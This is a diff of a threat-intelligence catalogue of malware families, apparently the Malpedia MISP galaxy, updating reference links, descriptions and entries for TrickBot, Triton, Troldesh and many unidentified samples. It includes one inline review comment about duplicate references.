"http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", - "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", - "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", - "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", - "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", - "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/", "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", - "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", - "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", - "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", - "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", 
- "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", - "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "http://www.malware-traffic-analysis.net/2018/02/01/", - "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", - "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", - "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", - "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/", + "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/", + "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", + "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + 
"https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", + "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/", + "https://www.secdata.com/the-trickbot-and-mikrotik/", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks", + "https://blog.cyberint.com/ryuk-crypto-ransomware", + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/", + "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + 
"https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://www.joesecurity.org/blog/498839998833561473", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/", + 
"https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://twitter.com/VK_Intel/status/1328578336021483522", + "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", + "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis", + "https://duo.com/decipher/trickbot-up-to-its-old-tricks", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.youtube.com/watch?v=EdchPEHnohw", - "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", - "https://www.youtube.com/watch?v=lTywPmZEU1A", - "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", - "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", - "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + 
"https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/",
+ "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/",
+ "https://osint.fans/service-nsw-russia-association"
 ],
 "synonyms": [
 "TheTrick",
@@ -16968,12 +30948,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton",
+ "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
+ "https://www.eenews.net/stories/1060123327/",
 "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
- "https://dragos.com/blog/trisis/TRISIS-01.pdf",
+ "https://home.treasury.gov/news/press-releases/sm1162",
+ "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
 "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
 "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
- "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
- "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf"
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://dragos.com/blog/trisis/TRISIS-01.pdf",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security"
 ],
 "synonyms": [
 "HatMan",
@@ -16990,9 +30976,15 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat",
 "https://github.com/5loyd/trochilus/",
- "https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/",
- "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf",
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
+ "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
+ "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
+ "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus"
 ],
 "synonyms": [],
 "type": []
@@ -17006,10 +30998,16 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh",
 "https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
- "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/",
+ "https://support.kaspersky.com/13059",
+ "https://blog.avast.com/ransomware-strain-troldesh-spikes",
+ "https://github.com/shade-team/keys",
 "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/",
+ "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/",
+ "https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/",
+ "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/",
 "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
- "https://support.kaspersky.com/13059"
+ "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/",
+ "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/"
 ],
 "synonyms": [
 "Shade"
@@ -17019,6 +31017,32 @@
 "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126",
 "value": "Troldesh"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber",
+ "https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "183fa14a-f42a-4508-b146-8550ba1acf2a",
+ "value": "TroubleGrabber"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer",
+ "https://seguranca-informatica.pt/troystealer-a-new-info-stealer-targeting-portuguese-internet-users"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "36d7dea1-6abf-41ea-bcd8-079f24dc0972",
+ "value": "troystealer"
+ },
 {
 "description": "",
 "meta": {
@@ -17047,22 +31071,79 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc", + "https://unit42.paloaltonetworks.com/ironnetinjector/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" ], "synonyms": [], "type": [] }, + "uuid": "8c6248d2-2b3a-4fe8-99cd-552077e3f84f", + "value": "TurlaRPC" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://twitter.com/Arkbird_SOLG/status/1304187749373800455", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" + ], + "synonyms": [ + "GoldenSky", + "HyperStack" + ], + "type": [] + }, + "uuid": "ddee7f00-66e0-4d89-bd51-4b0df516a248", + "value": "Turla SilentMoon" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/", + "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ], + "synonyms": [ + "Notestuk" + ], + "type": 
[] + }, "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", "value": "TURNEDUP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf" + ], + "synonyms": [ + "SkinnyD" + ], + "type": [] + }, + "uuid": "d7b0ccc8-051c-4ab1-908e-3bd1811d9e2e", + "value": "TypeHash" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", - "https://www.lastline.com/labsblog/tyupkin-atm-malware/" + "https://www.lastline.com/labsblog/tyupkin-atm-malware/", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] @@ -17070,11 +31151,25 @@ "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", "value": "Tyupkin" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.t_rat", + "https://www.gdatasoftware.com/blog/trat-control-via-smartphone" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb9e9ade-b154-43ba-a0ea-550322454acf", + "value": "T-RAT 2.0" + }, { "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://github.com/hfiref0x/UACME" ], "synonyms": [ 
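Review bot: The rebuilt TURNEDUP `refs` array at the end of this hunk lists the same two write-ups twice: `https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/` next to `https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/`, and the Elfin post under both `symantec-blogs.broadcom.com` and `www.symantec.com`. Duplicate references lengthen the array without adding a source, and consumers that count or display refs per cluster will show inflated numbers. Since this file is regenerated from the Malpedia MISP export, the dedup presumably belongs in the upstream record or the import script rather than a hand edit here; keeping whichever URL still resolves is enough, as the malpedia details link remains the canonical pointer.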
@@ -17091,7 +31186,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos",
 "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html",
- "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns"
+ "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns"
 ],
 "synonyms": [],
 "type": []
@@ -17152,18 +31247,6 @@
 "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1",
 "value": "Unidentified 003"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "29e32ea9-8e10-4c50-a4dc-1642066a3df2",
- "value": "win.unidentified_005"
- },
 {
 "description": "",
 "meta": {
@@ -17301,31 +31384,6 @@
 "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e",
 "value": "Unidentified 031"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032",
- "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "799921d7-48e8-47a6-989e-487b527af37a",
- "value": "Unidentified 032"
- },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260",
- "value": "Unidentified 035"
- },
 {
 "description": "",
 "meta": {
@@ -17424,32 +31482,6 @@
 "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2",
 "value": "Unidentified 047"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049",
- "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb",
- "value": "Unidentified 049 (Lazarus/RAT)"
- },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051",
- "https://twitter.com/CDA/status/1014144988454772736"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5",
- "value": "Unidentified 051"
- },
 {
 "description": "",
 "meta": {
@@ -17466,8 +31498,7 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053",
- "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053"
 ],
 "synonyms": [],
 "type": []
@@ -17475,20 +31506,6 @@
 "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233",
 "value": "Unidentified 053 (Wonknu?)"
 },
- {
- "description": "Unnamed downloader for win.wscspl as described in the 360ti blog post.",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_055",
- "https://www.freebuf.com/articles/database/192726.html",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "b001ebb7-5d33-4972-96cc-56f9549dff27",
- "value": "Unidentified 055"
- },
 {
 "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).",
 "meta": {
@@ -17516,6 +31533,228 @@ "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", "value": "Unidentified 058" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_059" + ], + "synonyms": [], + "type": [] + }, + "uuid": "", + "value": "win.unidentified_059" + }, + { + "description": "Unidentified sideloader used by EmissaryPanda", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_060", + "https://norfolkinfosec.com/emissary-panda-dll-backdoor/", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "84f43641-77bc-4dcb-a104-150e8574da22", + "value": "Unidentified 060" + }, + { + "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061" + ], + "synonyms": [], + "type": [] + }, + "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", + "value": "Unidentified 061" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063", + "https://twitter.com/KevinPerlow/status/1160766519615381504" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d34ac949-3816-436b-a719-b4ced192388e", + "value": "Unidentified 063 (Lazarus Keylogger)" + }, + { + "description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. 
At the end, it downloads a Python-based RAT, called PeppyRAT.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_066", + "https://s.tencent.com/research/report/669.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e78c402f-998b-43ff-8102-f54838afcb8b", + "value": "Unidentified 066" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_067", + "https://s.tencent.com/research/report/831.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "224066ee-4266-44a3-8ea2-b5d7b9b4969a", + "value": "Unidentified 067" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068", + "https://rules.emergingthreatspro.com/changelogs/suricata-5.0-enhanced.etpro.2019-12-05T23:38:02.txt" + ], + "synonyms": [], + "type": [] + }, + "uuid": "26bfad72-59d8-456e-a200-eb18e614e5cb", + "value": "Unidentified 068" + }, + { + "description": "Zeus derivate, no known public references.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069", + "https://zeusmuseum.com/unnamed%202/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cc66d112-2ff5-462c-b029-15458d51f8a7", + "value": "Unidentified 069 (Zeus Unnamed2)" + }, + { + "description": "Unidentified downloader, possibly related to KONNI.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070", + "https://twitter.com/M11Sec/status/1217781224204357633" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bdef005-fd36-4ce0-a215-d49bf05b8fb8", + "value": "Unidentified 070 (Downloader)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071", + "https://zeusmuseum.com/unnamed%201/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cc7de9da-dc33-4cf8-9388-986b001fad63", + "value": "Unidentified 071 
(Zeus Unnamed1)" + }, + { + "description": "MSI-based loader that has been observed as a stager for win.metamorfo.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_072", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f2979fee-603d-496e-a526-d622e9cba84f", + "value": "Unidentified 072 (Metamorfo Loader)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073", + "https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f049e626-7de2-4648-81db-53dfd34f2fab", + "value": "Unidentified 073 (Charming Kitten)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074", + "https://blog.vincss.net/2019/12/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-2020.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4b60bda2-c587-4069-ace1-6283891d5faf", + "value": "Unidentified 074 (Downloader)" + }, + { + "description": "Unpacked http_dll.dat from the blog post.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075", + "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "66f26a60-ab6a-4b7c-bd85-afdc44dbcfdd", + "value": "Unidentified 075" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076", + "https://www.zscaler.com/blogs/research/return-higaisa-apt", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://www.youtube.com/watch?v=8x-pGlWpIYI" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4d5d0798-9cb3-4f26-8c98-db8d7190d187", + 
"value": "Unidentified 076 (Higaisa LNK to Shellcode)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077", + "https://twitter.com/ccxsaber/status/1277064824434745345" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ca8a1900-ea9a-4d83-8873-6c48ac12da9a", + "value": "Unidentified 077 (Lazarus Downloader)" + }, + { + "description": "Suspected Zebrocy loader written in Nim.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078", + "https://twitter.com/Vishnyak0v/status/1300704689865060353" + ], + "synonyms": [], + "type": [] + }, + "uuid": "99099489-eeb9-415a-a3b8-6133e774bed0", + "value": "Unidentified 078 (Zebrocy Nim Loader?)" + }, { "description": "", "meta": { @@ -17536,7 +31775,6 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", - "https://twitter.com/ulexec/status/1005096227741020160", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/" ], "synonyms": [ @@ -17548,10 +31786,11 @@ "value": "UPAS" }, { - "description": "", + "description": "Upatre is primarly a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", + 